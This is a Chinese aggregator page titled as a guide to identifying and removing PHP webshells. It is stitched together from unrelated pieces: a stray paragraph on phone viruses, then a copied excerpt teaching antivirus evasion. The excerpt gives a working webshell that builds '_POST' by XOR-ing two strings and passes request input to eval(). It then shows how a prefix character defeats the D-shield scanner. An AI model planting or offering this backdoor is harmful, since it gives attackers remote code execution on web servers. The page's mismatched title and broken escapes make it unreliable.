如何查找识别删除简单的免杀PHP Webshell后门
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何查找识别删除简单的免杀PHP Webshell后门相关的知识,希望对你有一定的参考价值。
参考技术A 请先尝试卸载病毒程序。病毒会伪装为正常软件或者诱惑性名称,一般的表现是手机自动下载其他推广软件、手机卡顿发热、出现有遮挡的广告等。甚至会拦截正常的银行短信导致用户的账号被盗,银行卡被盗刷等。若怀疑手机中存在木马或者病毒PHP7.1后webshell免杀的去路
文章来源:安全客
原文链接:
https://www.anquanke.com/post/id/193787
<?php
function encode($para0){
return $para0;
}
$b = encode("aaaa");
$a = "ccc";
eval($a);
?>
$a = "~+d()"^"!{+{}";
$b = ${$a}[a];
eval($b);
$a = "~+d()"^"!{+{}";
,而字符串
"~+d()"^"!{+{}"
异或的结果为
_POST
,我直接输出给大家看看:
echo $a
即为如下结果:
$b = ${$a}[a];
与
$b = $_POST[a]
等价,在将其传入eval()中,我们就成功了第一步,我们已经使得D盾报木马的级别降低了,由”5级 已知后门“变为”1级可疑(内藏)Eval后门{参数:
$b(未知内容)}“了,哈哈,这就说明此时我们已经成功隐藏了我们所传入的参数,但是D盾在这里有点“我不认识的都可疑,宁可错杀一千,绝不放过一个了”,既然D盾这么较真,我们也较真点,彻底绕过。
<?php
$a = "~+d()"^"!{+{}";
$b = ${$a}[a];
eval("n".$b);
?>
$b
的前面加上
“n"
就成功绕过了,当然同理,你也可以在参数$b的前面加上
""
、
"t"
、
"r"
等等也是可以绕过的。
你可能喜欢
以上是关于如何查找识别删除简单的免杀PHP Webshell后门的主要内容,如果未能解决你的问题,请参考以下文章